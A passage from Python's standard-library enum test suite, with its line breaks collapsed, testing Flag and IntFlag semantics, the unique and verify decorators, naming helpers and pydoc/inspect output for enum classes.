self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2) self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3) def test_number_reset_and_order_cleanup(self): class Confused(Flag): _order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN' ONE = auto() TWO = auto() FOUR = auto() DOS = 2 EIGHT = auto() SIXTEEN = auto() self.assertEqual( list(Confused), [Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN]) self.assertIs(Confused.TWO, Confused.DOS) self.assertEqual(Confused.DOS._value_, 2) self.assertEqual(Confused.EIGHT._value_, 8) self.assertEqual(Confused.SIXTEEN._value_, 16) def test_aliases(self): Color = self.Color self.assertEqual(Color(1).name, 'RED') self.assertEqual(Color['ROJO'].name, 'RED') self.assertEqual(Color(7).name, 'WHITE') self.assertEqual(Color['BLANCO'].name, 'WHITE') self.assertIs(Color.BLANCO, Color.WHITE) Open = self.Open self.assertIs(Open['AC'], Open.AC) def test_auto_number(self): class Color(Flag): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 1) self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 4) def test_auto_number_garbage(self): with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'): class Color(Flag): red = 'not an int' blue = auto() def test_duplicate_auto(self): class Dupes(Enum): first = primero = auto() second = auto() third = auto() self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes)) def test_multiple_mixin(self): class AllMixin: @classproperty def ALL(cls): members = list(cls) all_value = None if members: all_value = members[0] for member in members[1:]: all_value |= member cls.ALL = all_value return all_value class StrMixin: def __str__(self): return self._name_.lower() class Color(AllMixin, Flag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'BLUE') class Color(AllMixin, StrMixin, Flag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') class Color(StrMixin, AllMixin, Flag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') @threading_helper.reap_threads def test_unique_composite(self): # override __eq__ to be identity only class TestFlag(Flag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return hash(self._value_) # have multiple threads competing to complete the composite members seen = set() failed = False def cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [ threading.Thread(target=cycle_enum) for _ in range(8) ] with threading_helper.start_threads(threads): pass # check that only 248 members were created self.assertFalse( failed, 'at least one thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') def test_init_subclass(self): class MyEnum(Flag): def __init_subclass__(cls, **kwds): super().__init_subclass__(**kwds) self.assertFalse(cls.__dict__.get('_test', False)) cls._test1 = 'MyEnum' # class TheirEnum(MyEnum): def __init_subclass__(cls, **kwds): super(TheirEnum, cls).__init_subclass__(**kwds) cls._test2 = 'TheirEnum' class WhoseEnum(TheirEnum): def __init_subclass__(cls, **kwds): pass class NoEnum(WhoseEnum): ONE = 1 self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum') self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum') self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum') self.assertFalse(NoEnum.__dict__.get('_test1', False)) self.assertFalse(NoEnum.__dict__.get('_test2', False)) # class OurEnum(MyEnum): def __init_subclass__(cls, **kwds): cls._test2 = 'OurEnum' class WhereEnum(OurEnum): def __init_subclass__(cls, **kwds): pass class NeverEnum(WhereEnum): ONE = 1 self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum') self.assertFalse(WhereEnum.__dict__.get('_test1', False)) self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum') self.assertFalse(NeverEnum.__dict__.get('_test1', False)) self.assertFalse(NeverEnum.__dict__.get('_test2', False)) def test_default_missing(self): with self.assertRaisesRegex( ValueError, "'RED' is not a valid TestFlag.Color", ) as ctx: self.Color('RED') self.assertIs(ctx.exception.__context__, None) P = Flag('P', 'X Y') with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx: P('X') self.assertIs(ctx.exception.__context__, None) class TestIntFlag(unittest.TestCase): """Tests of the IntFlags.""" class Perm(IntFlag): R = 1 << 2 W = 1 << 1 X = 1 << 0 class Open(IntFlag): RO = 0 WO = 1 RW = 2 AC = 3 CE = 1<<19 class Color(IntFlag): BLACK = 0 RED = 1 ROJO = 1 GREEN = 2 BLUE = 4 PURPLE = RED|BLUE WHITE = RED|GREEN|BLUE BLANCO = RED|GREEN|BLUE class Skip(IntFlag): FIRST = 1 SECOND = 2 EIGHTH = 8 def test_type(self): Perm = self.Perm self.assertTrue(Perm._member_type_ is int) Open = self.Open for f in Perm: self.assertTrue(isinstance(f, Perm)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Perm.W | Perm.X, Perm)) self.assertEqual(Perm.W | Perm.X, 3) for f in Open: self.assertTrue(isinstance(f, Open)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Open.WO | Open.RW, Open)) self.assertEqual(Open.WO | Open.RW, 3) def test_str(self): Perm = self.Perm self.assertEqual(str(Perm.R), 'R') self.assertEqual(str(Perm.W), 'W') self.assertEqual(str(Perm.X), 'X') self.assertEqual(str(Perm.R | Perm.W), 'R|W') self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X') self.assertEqual(str(Perm.R | 8), '12') self.assertEqual(str(Perm(0)), 'Perm(0)') self.assertEqual(str(Perm(8)), '8') self.assertEqual(str(~Perm.R), 'W|X') self.assertEqual(str(~Perm.W), 'R|X') self.assertEqual(str(~Perm.X), 'R|W') self.assertEqual(str(~(Perm.R | Perm.W)), 'X') self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)') self.assertEqual(str(~(Perm.R | 8)), '-13') self.assertEqual(str(Perm(~0)), 'R|W|X') self.assertEqual(str(Perm(~8)), '-9') Open = self.Open self.assertEqual(str(Open.RO), 'RO') self.assertEqual(str(Open.WO), 'WO') self.assertEqual(str(Open.AC), 'AC') self.assertEqual(str(Open.RO | Open.CE), 'CE') self.assertEqual(str(Open.WO | Open.CE), 'WO|CE') self.assertEqual(str(Open(4)), '4') self.assertEqual(str(~Open.RO), 'WO|RW|CE') self.assertEqual(str(~Open.WO), 'RW|CE') self.assertEqual(str(~Open.AC), 'CE') self.assertEqual(str(~(Open.RO | Open.CE)), 'AC') self.assertEqual(str(~(Open.WO | Open.CE)), 'RW') self.assertEqual(str(Open(~4)), '-5') def test_repr(self): Perm = self.Perm self.assertEqual(repr(Perm.R), 'Perm.R') self.assertEqual(repr(Perm.W), 'Perm.W') self.assertEqual(repr(Perm.X), 'Perm.X') self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W') self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X') self.assertEqual(repr(Perm.R | 8), '12') self.assertEqual(repr(Perm(0)), '0x0') self.assertEqual(repr(Perm(8)), '8') self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X') self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X') self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W') self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X') self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0') self.assertEqual(repr(~(Perm.R | 8)), '-13') self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X') self.assertEqual(repr(Perm(~8)), '-9') Open = self.Open self.assertEqual(repr(Open.RO), 'Open.RO') self.assertEqual(repr(Open.WO), 'Open.WO') self.assertEqual(repr(Open.AC), 'Open.AC') self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE') self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE') self.assertEqual(repr(Open(4)), '4') self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE') self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE') self.assertEqual(repr(~Open.AC), 'Open.CE') self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC') self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW') self.assertEqual(repr(Open(~4)), '-5') def test_global_repr_keep(self): self.assertEqual( repr(HeadlightsK(0)), '%s.OFF_K' % SHORT_MODULE, ) self.assertEqual( repr(HeadlightsK(2**0 + 2**2 + 2**3)), '%(m)s.LOW_BEAM_K|%(m)s.FOG_K|0x8' % {'m': SHORT_MODULE}, ) self.assertEqual( repr(HeadlightsK(2**3)), '%(m)s.HeadlightsK(0x8)' % {'m': SHORT_MODULE}, ) def test_global_repr_conform1(self): self.assertEqual( repr(HeadlightsC(0)), '%s.OFF_C' % SHORT_MODULE, ) self.assertEqual( repr(HeadlightsC(2**0 + 2**2 + 2**3)), '%(m)s.LOW_BEAM_C|%(m)s.FOG_C' % {'m': SHORT_MODULE}, ) self.assertEqual( repr(HeadlightsC(2**3)), '%(m)s.OFF_C' % {'m': SHORT_MODULE}, ) def test_format(self): Perm = self.Perm self.assertEqual(format(Perm.R, ''), '4') self.assertEqual(format(Perm.R | Perm.X, ''), '5') # class NewPerm(IntFlag): R = 1 << 2 W = 1 << 1 X = 1 << 0 def __str__(self): return self._name_ self.assertEqual(format(NewPerm.R, ''), 'R') self.assertEqual(format(NewPerm.R | Perm.X, ''), 'R|X') def test_or(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i | j, i.value | j.value) self.assertEqual((i | j).value, i.value | j.value) self.assertIs(type(i | j), Perm) for j in range(8): self.assertEqual(i | j, i.value | j) self.assertEqual((i | j).value, i.value | j) self.assertIs(type(i | j), Perm) self.assertEqual(j | i, j | i.value) self.assertEqual((j | i).value, j | i.value) self.assertIs(type(j | i), Perm) for i in Perm: self.assertIs(i | i, i) self.assertIs(i | 0, i) self.assertIs(0 | i, i) Open = self.Open self.assertIs(Open.RO | Open.CE, Open.CE) def test_and(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: for j in values: self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j)) for j in range(8): self.assertEqual(i & j, i.value & j) self.assertEqual((i & j).value, i.value & j) self.assertIs(type(i & j), Perm) self.assertEqual(j & i, j & i.value) self.assertEqual((j & i).value, j & i.value) self.assertIs(type(j & i), Perm) for i in Perm: self.assertIs(i & i, i) self.assertIs(i & 7, i) self.assertIs(7 & i, i) Open = self.Open self.assertIs(Open.RO & Open.CE, Open.RO) def test_xor(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i ^ j, i.value ^ j.value) self.assertEqual((i ^ j).value, i.value ^ j.value) self.assertIs(type(i ^ j), Perm) for j in range(8): self.assertEqual(i ^ j, i.value ^ j) self.assertEqual((i ^ j).value, i.value ^ j) self.assertIs(type(i ^ j), Perm) self.assertEqual(j ^ i, j ^ i.value) self.assertEqual((j ^ i).value, j ^ i.value) self.assertIs(type(j ^ i), Perm) for i in Perm: self.assertIs(i ^ 0, i) self.assertIs(0 ^ i, i) Open = self.Open self.assertIs(Open.RO ^ Open.CE, Open.CE) self.assertIs(Open.CE ^ Open.CE, Open.RO) def test_invert(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: self.assertEqual(~i, (~i).value) self.assertIs(type(~i), Perm) self.assertEqual(~~i, i) for i in Perm: self.assertIs(~~i, i) Open = self.Open self.assertIs(Open.WO & ~Open.WO, Open.RO) self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE) def test_boundary(self): self.assertIs(enum.IntFlag._boundary_, EJECT) class Iron(IntFlag, boundary=STRICT): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Iron._boundary_, STRICT) # class Water(IntFlag, boundary=CONFORM): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Water._boundary_, CONFORM) # class Space(IntFlag, boundary=EJECT): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Space._boundary_, EJECT) # # class Bizarre(IntFlag, boundary=KEEP): b = 3 c = 4 d = 6 # self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5) # self.assertIs(Water(7), Water.ONE|Water.TWO) self.assertIs(Water(~9), Water.TWO) # self.assertEqual(Space(7), 7) self.assertTrue(type(Space(7)) is int) # self.assertEqual(list(Bizarre), [Bizarre.c]) self.assertIs(Bizarre(3), Bizarre.b) self.assertIs(Bizarre(6), Bizarre.d) def test_iter(self): Color = self.Color Open = self.Open self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE]) self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE]) def test_programatic_function_string(self): Perm = IntFlag('Perm', 'R W X') lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_with_start(self): Perm = IntFlag('Perm', 'R W X', start=8) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 8<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_list(self): Perm = IntFlag('Perm', ['R', 'W', 'X']) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_iterable(self): Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<(2*i+1) e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_dict(self): Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32)))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<(2*i+1) e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_empty_list(self): Perm = enum.IntFlag('Perm', []) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 0, Perm) Thing = enum.Enum('Thing', []) lst = list(Thing) self.assertEqual(len(lst), len(Thing)) self.assertEqual(len(Thing), 0, Thing) def test_programatic_function_from_empty_tuple(self): Perm = enum.IntFlag('Perm', ()) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 0, Perm) Thing = enum.Enum('Thing', ()) self.assertEqual(len(lst), len(Thing)) self.assertEqual(len(Thing), 0, Thing) @unittest.skipIf( python_version >= (3, 12), '__contains__ now returns True/False for all inputs', ) def test_contains_er(self): Open = self.Open Color = self.Color self.assertTrue(Color.GREEN in Color) self.assertTrue(Open.RW in Open) self.assertFalse(Color.GREEN in Open) self.assertFalse(Open.RW in Color) with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'GREEN' in Color with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'RW' in Open with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 2 in Color with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 2 in Open @unittest.skipIf( python_version < (3, 12), '__contains__ only works with enum memmbers before 3.12', ) def test_contains_tf(self): Open = self.Open Color = self.Color self.assertTrue(Color.GREEN in Color) self.assertTrue(Open.RW in Open) self.assertTrue(Color.GREEN in Open) self.assertTrue(Open.RW in Color) self.assertFalse('GREEN' in Color) self.assertFalse('RW' in Open) self.assertTrue(2 in Color) self.assertTrue(2 in Open) def test_member_contains(self): Perm = self.Perm R, W, X = Perm RW = R | W RX = R | X WX = W | X RWX = R | W | X self.assertTrue(R in RW) self.assertTrue(R in RX) self.assertTrue(R in RWX) self.assertTrue(W in RW) self.assertTrue(W in WX) self.assertTrue(W in RWX) self.assertTrue(X in RX) self.assertTrue(X in WX) self.assertTrue(X in RWX) self.assertFalse(R in WX) self.assertFalse(W in RX) self.assertFalse(X in RW) with self.assertRaises(TypeError): self.assertFalse('test' in RW) def test_member_iter(self): Color = self.Color self.assertEqual(list(Color.BLACK), []) self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE]) self.assertEqual(list(Color.BLUE), [Color.BLUE]) self.assertEqual(list(Color.GREEN), [Color.GREEN]) self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE]) def test_member_length(self): self.assertEqual(self.Color.__len__(self.Color.BLACK), 0) self.assertEqual(self.Color.__len__(self.Color.GREEN), 1) self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2) self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3) def test_aliases(self): Color = self.Color self.assertEqual(Color(1).name, 'RED') self.assertEqual(Color['ROJO'].name, 'RED') self.assertEqual(Color(7).name, 'WHITE') self.assertEqual(Color['BLANCO'].name, 'WHITE') self.assertIs(Color.BLANCO, Color.WHITE) Open = self.Open self.assertIs(Open['AC'], Open.AC) def test_bool(self): Perm = self.Perm for f in Perm: self.assertTrue(f) Open = self.Open for f in Open: self.assertEqual(bool(f.value), bool(f)) def test_multiple_mixin(self): class AllMixin: @classproperty def ALL(cls): members = list(cls) all_value = None if members: all_value = members[0] for member in members[1:]: all_value |= member cls.ALL = all_value return all_value class StrMixin: def __str__(self): return self._name_.lower() class Color(AllMixin, IntFlag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'BLUE') class Color(AllMixin, StrMixin, IntFlag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') class Color(StrMixin, AllMixin, IntFlag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') @threading_helper.reap_threads def test_unique_composite(self): # override __eq__ to be identity only class TestFlag(IntFlag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return hash(self._value_) # have multiple threads competing to complete the composite members seen = set() failed = False def cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [ threading.Thread(target=cycle_enum) for _ in range(8) ] with threading_helper.start_threads(threads): pass # check that only 248 members were created self.assertFalse( failed, 'at least one thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') def test_default_missing(self): with self.assertRaisesRegex( ValueError, "'RED' is not a valid TestIntFlag.Color", ) as ctx: self.Color('RED') self.assertIs(ctx.exception.__context__, None) P = IntFlag('P', 'X Y') with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx: P('X') self.assertIs(ctx.exception.__context__, None) class TestEmptyAndNonLatinStrings(unittest.TestCase): def test_empty_string(self): with self.assertRaises(ValueError): empty_abc = Enum('empty_abc', ('', 'B', 'C')) def test_non_latin_character_string(self): greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C')) item = getattr(greek_abc, '\u03B1') self.assertEqual(item.value, 1) def test_non_latin_number_string(self): hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3')) item = getattr(hebrew_123, '\u05D0') self.assertEqual(item.value, 1) class TestUnique(unittest.TestCase): def test_unique_clean(self): @unique class Clean(Enum): one = 1 two = 'dos' tres = 4.0 # @unique class Cleaner(IntEnum): single = 1 double = 2 triple = 3 def test_unique_dirty(self): with self.assertRaisesRegex(ValueError, 'tres.*one'): @unique class Dirty(Enum): one = 1 two = 'dos' tres = 1 with self.assertRaisesRegex( ValueError, 'double.*single.*turkey.*triple', ): @unique class Dirtier(IntEnum): single = 1 double = 1 triple = 3 turkey = 3 def test_unique_with_name(self): @verify(UNIQUE) class Silly(Enum): one = 1 two = 'dos' name = 3 # @verify(UNIQUE) class Sillier(IntEnum): single = 1 name = 2 triple = 3 value = 4 class TestVerify(unittest.TestCase): def test_continuous(self): @verify(CONTINUOUS) class Auto(Enum): FIRST = auto() SECOND = auto() THIRD = auto() FORTH = auto() # @verify(CONTINUOUS) class Manual(Enum): FIRST = 3 SECOND = 4 THIRD = 5 FORTH = 6 # with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'): @verify(CONTINUOUS) class Missing(Enum): FIRST = 3 SECOND = 4 THIRD = 11 FORTH = 13 # with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'): @verify(CONTINUOUS) class Incomplete(Flag): FIRST = 4 SECOND = 8 THIRD = 16 FORTH = 64 # with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'): @verify(CONTINUOUS) class StillIncomplete(Flag): FIRST = 4 SECOND = 8 THIRD = 11 FORTH = 32 def test_composite(self): class Bizarre(Flag): b = 3 c = 4 d = 6 self.assertEqual(list(Bizarre), [Bizarre.c]) self.assertEqual(Bizarre.b.value, 3) self.assertEqual(Bizarre.c.value, 4) self.assertEqual(Bizarre.d.value, 6) with self.assertRaisesRegex( ValueError, "invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.", ): @verify(NAMED_FLAGS) class Bizarre(Flag): b = 3 c = 4 d = 6 # self.assertEqual(enum.show_flag_values(3), [1, 2]) class Bizarre(IntFlag): b = 3 c = 4 d = 6 self.assertEqual(list(Bizarre), [Bizarre.c]) self.assertEqual(Bizarre.b.value, 3) self.assertEqual(Bizarre.c.value, 4) self.assertEqual(Bizarre.d.value, 6) with self.assertRaisesRegex( ValueError, "invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. for details.", ): @verify(NAMED_FLAGS) class Bizarre(IntFlag): c = 4 d = 6 self.assertEqual(enum.show_flag_values(2), [2]) def test_unique_clean(self): @verify(UNIQUE) class Clean(Enum): one = 1 two = 'dos' tres = 4.0 # @verify(UNIQUE) class Cleaner(IntEnum): single = 1 double = 2 triple = 3 def test_unique_dirty(self): with self.assertRaisesRegex(ValueError, 'tres.*one'): @verify(UNIQUE) class Dirty(Enum): one = 1 two = 'dos' tres = 1 with self.assertRaisesRegex( ValueError, 'double.*single.*turkey.*triple', ): @verify(UNIQUE) class Dirtier(IntEnum): single = 1 double = 1 triple = 3 turkey = 3 def test_unique_with_name(self): @verify(UNIQUE) class Silly(Enum): one = 1 two = 'dos' name = 3 # @verify(UNIQUE) class Sillier(IntEnum): single = 1 name = 2 triple = 3 value = 4 class TestHelpers(unittest.TestCase): sunder_names = '_bad_', '_good_', '_what_ho_' dunder_names = '__mal__', '__bien__', '__que_que__' private_names = '_MyEnum__private', '_MyEnum__still_private' private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_' random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__' def test_sunder(self): for name in self.sunder_names + self.private_and_sunder_names: self.assertTrue(enum._is_sunder(name), '%r is a not sunder name?' % name) for name in self.dunder_names + self.private_names + self.random_names: self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name) def test_dunder(self): for name in self.dunder_names: self.assertTrue(enum._is_dunder(name), '%r is a not dunder name?' % name) for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names: self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name) def test_is_private(self): for name in self.private_names + self.private_and_sunder_names: self.assertTrue(enum._is_private('MyEnum', name), '%r is a not private name?') for name in self.sunder_names + self.dunder_names + self.random_names: self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?') class TestEnumTypeSubclassing(unittest.TestCase): pass expected_help_output_with_docs = """\ Help on class Color in module %s: class Color(enum.Enum) | Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None) |\x20\x20 | An enumeration. |\x20\x20 | Method resolution order: | Color | enum.Enum | builtins.object |\x20\x20 | Data and other attributes defined here: |\x20\x20 | blue = Color.blue |\x20\x20 | green = Color.green |\x20\x20 | red = Color.red |\x20\x20 | ---------------------------------------------------------------------- | Data descriptors inherited from enum.Enum: |\x20\x20 | name | The name of the Enum member. |\x20\x20 | value | The value of the Enum member. |\x20\x20 | ---------------------------------------------------------------------- | Readonly properties inherited from enum.EnumType: |\x20\x20 | __members__ | Returns a mapping of member name->value. |\x20\x20\x20\x20\x20\x20 | This mapping lists all enum members, including aliases. Note that this | is a read-only view of the internal mapping.""" expected_help_output_without_docs = """\ Help on class Color in module %s: class Color(enum.Enum) | Color(value, names=None, *, module=None, qualname=None, type=None, start=1) |\x20\x20 | Method resolution order: | Color | enum.Enum | builtins.object |\x20\x20 | Data and other attributes defined here: |\x20\x20 | blue = Color.blue |\x20\x20 | green = Color.green |\x20\x20 | red = Color.red |\x20\x20 | ---------------------------------------------------------------------- | Data descriptors inherited from enum.Enum: |\x20\x20 | name |\x20\x20 | value |\x20\x20 | ---------------------------------------------------------------------- | Data descriptors inherited from enum.EnumType: |\x20\x20 | __members__""" class TestStdLib(unittest.TestCase): maxDiff = None class Color(Enum): red = 1 green = 2 blue = 3 def test_pydoc(self): # indirectly test __objclass__ if StrEnum.__doc__ is None: expected_text = expected_help_output_without_docs % __name__ else: expected_text = expected_help_output_with_docs % __name__ output = StringIO() helper = pydoc.Helper(output=output) helper(self.Color) result = output.getvalue().strip() self.assertEqual(result, expected_text) def test_inspect_getmembers(self): values = dict(( ('__class__', EnumType), ('__doc__', 'An enumeration.'), ('__members__', self.Color.__members__), ('__module__', __name__), ('blue', self.Color.blue), ('green', self.Color.green), ('name', Enum.__dict__['name']), ('red', self.Color.red), ('value', Enum.__dict__['value']), )) result = dict(inspect.getmembers(self.Color)) self.assertEqual(set(values.keys()), set(result.keys())) failed = False for k in values.keys(): if result[k] != values[k]: print() print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' % ('=' * 75, k, result[k], values[k], '=' * 75), sep='') failed = True if failed: self.fail("result does not equal expected, see print above") def test_inspect_classify_class_attrs(self): # indirectly test __objclass__ from inspect import Attribute values = [ Attribute(name='__class__', kind='data', defining_class=object, object=EnumType), Attribute(name='__doc__', kind='data', defining_class=self.Color, object='An enumeration.'), Attribute(name='__members__', kind='property', defining_class=EnumType, object=EnumType.__members__), Attribute(name='__module__', kind='data', defining_class=self.Color, object=__name__), Attribute(name='blue', kind='data', defining_class=self.Color, object=self.Color.blue), Attribute(name='green', kind='data', defining_class=self.Color, object=self.Color.green), Attribute(name='red', kind='data', defining_class=self.Color, object=self.Color.red), Attribute(name='name', kind='data', defining_class=Enum, object=Enum.__dict__['name']), Attribute(name='value', kind='data', defining_class=Enum, object=Enum.__dict__['value']), ] values.sort(key=lambda item: item.name) result = list(inspect.classify_class_attrs(self.Color)) result.sort(key=lambda item: item.name) self.assertEqual( len(values), len(result), "%s != %s" % ([a.name for a in values], [a.name for a in result]) ) failed = False for v, r in zip(values, result): if r != v: print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='') failed = True if failed: self.fail("result does not equal expected, see print above") def test_test_simple_enum(self): @_simple_enum(Enum) class SimpleColor: RED = 1 GREEN = 2 BLUE = 3 class CheckedColor(Enum): RED = 1 GREEN = 2 BLUE = 3 self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None) SimpleColor.GREEN._value_ = 9 self.assertRaisesRegex( TypeError, "enum mismatch", _test_simple_enum, 